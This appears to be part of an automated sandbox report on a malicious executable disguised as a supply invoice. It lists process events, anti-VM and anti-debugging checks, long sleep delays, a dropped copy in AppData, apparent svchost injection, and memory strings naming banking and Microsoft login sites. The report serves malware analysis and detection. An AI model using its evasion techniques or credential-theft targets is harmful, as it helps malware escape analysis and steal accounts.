            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: z1SupplyInvoiceCM60916_Doc.exe PID: 3840, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: dpqsbGoWdXlp.exe PID: 1708, type: MEMORYSTR
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeMemory allocated: 16C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeMemory allocated: 34A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeMemory allocated: 3340000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeMemory allocated: 9460000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeMemory allocated: 77A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeMemory allocated: A460000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeMemory allocated: B460000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeMemory allocated: 1050000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeMemory allocated: 29F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeMemory allocated: 49F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeMemory allocated: 8710000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeMemory allocated: 7230000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeMemory allocated: 9710000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeMemory allocated: A710000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0174096E rdtsc 11_2_0174096E
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeCode function: 12_2_010B6EC1 sidt fword ptr [ebx+0000C3C2h]12_2_010B6EC1
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5908Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6575Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 9742Jump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 2.6 %
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe TID: 3896Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5580Thread sleep count: 5908 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3968Thread sleep time: -5534023222112862s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1008Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 404Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2328Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe TID: 3796Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe TID: 3360Thread sleep time: -75000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe TID: 3360Thread sleep time: -57000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe TID: 3360Thread sleep time: -42000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exe TID: 4412Thread sleep count: 231 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exe TID: 4412Thread sleep time: -462000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exe TID: 4412Thread sleep count: 9742 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exe TID: 4412Thread sleep time: -19484000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007CC3A0 FindFirstFileW,FindNextFileW,FindClose,15_2_007CC3A0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: 7-j38IBI.15.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: 7-j38IBI.15.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: 7-j38IBI.15.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: z1SupplyInvoiceCM60916_Doc.exe, 00000000.00000002.2189838691.00000000018BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}h
            Source: 7-j38IBI.15.drBinary or memory string: discord.comVMware20,11696487552f
            Source: 7-j38IBI.15.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: 7-j38IBI.15.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: 7-j38IBI.15.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: 7-j38IBI.15.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: 7-j38IBI.15.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: 7-j38IBI.15.drBinary or memory string: global block list test formVMware20,11696487552
            Source: 7-j38IBI.15.drBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: svchost.exe, 0000000F.00000002.4575202622.0000000002E0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
            Source: 7-j38IBI.15.drBinary or memory string: AMC password management pageVMware20,11696487552
            Source: 7-j38IBI.15.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: 7-j38IBI.15.drBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: 7-j38IBI.15.drBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: firefox.exe, 00000017.00000002.2584597655.0000025C7218C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK
            Source: 7-j38IBI.15.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: 7-j38IBI.15.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: IEFVDUdSaLLhw.exe, 0000000D.00000002.4576448168.0000000000A47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls"Q
            Source: 7-j38IBI.15.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: 7-j38IBI.15.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: 7-j38IBI.15.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: 7-j38IBI.15.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: 7-j38IBI.15.drBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: 7-j38IBI.15.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: 7-j38IBI.15.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: 7-j38IBI.15.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: 7-j38IBI.15.drBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: z1SupplyInvoiceCM60916_Doc.exe, 00000000.00000002.2189838691.00000000018BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\l4+,uF
            Source: 7-j38IBI.15.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: 7-j38IBI.15.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: 7-j38IBI.15.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: 7-j38IBI.15.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: 7-j38IBI.15.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0174096E rdtsc 11_2_0174096E
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_004177A3 LdrLoadDll,11_2_004177A3
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D4164 mov eax, dword ptr fs:[00000030h]11_2_017D4164
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D4164 mov eax, dword ptr fs:[00000030h]11_2_017D4164
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01798158 mov eax, dword ptr fs:[00000030h]11_2_01798158
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01706154 mov eax, dword ptr fs:[00000030h]11_2_01706154
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01706154 mov eax, dword ptr fs:[00000030h]11_2_01706154
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016FC156 mov eax, dword ptr fs:[00000030h]11_2_016FC156
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01794144 mov eax, dword ptr fs:[00000030h]11_2_01794144
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01794144 mov eax, dword ptr fs:[00000030h]11_2_01794144
